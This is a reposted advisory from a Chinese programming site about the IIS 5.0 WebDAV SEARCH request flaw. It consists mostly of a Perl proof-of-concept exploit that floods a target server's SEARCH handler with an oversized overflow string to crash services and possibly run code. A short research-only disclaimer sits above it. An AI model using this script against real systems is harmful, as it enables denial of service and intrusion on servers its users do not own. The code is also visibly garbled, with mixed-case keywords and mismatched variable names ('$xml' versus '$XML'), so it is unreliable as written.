程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> ASP編程 >> ASP技巧 >> IIS 處理 SEARCH 請求漏洞

IIS 處理 SEARCH 請求漏洞

編輯:ASP技巧

涉及程序:
IIS
 
描述:
通過構造特殊的 SEARCH 請求導致 IIS 執行攻擊者代碼漏洞
 
詳細:
發現 IIS 在處理 SEARCH 請求時存在漏洞,攻擊者通過提交構造特殊的 IIS SEARCH 請求能重啟與 IIS 相關的所有服務,而且可能遠程執行任意代碼。

以下代碼僅僅用來測試和研究這個漏洞,如果您將其用於不正當的途徑請後果自負

 

Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
PRintf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n";
if(@ARGV < 2) { dIE "\nUsage: IIS5host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest XMLns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE
("'.$over.'")</D:sql></D:searchrequest>'."\n";
$l=length($XML);
$req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$XML\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

受影響系統:
IIS 5.0 

 

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved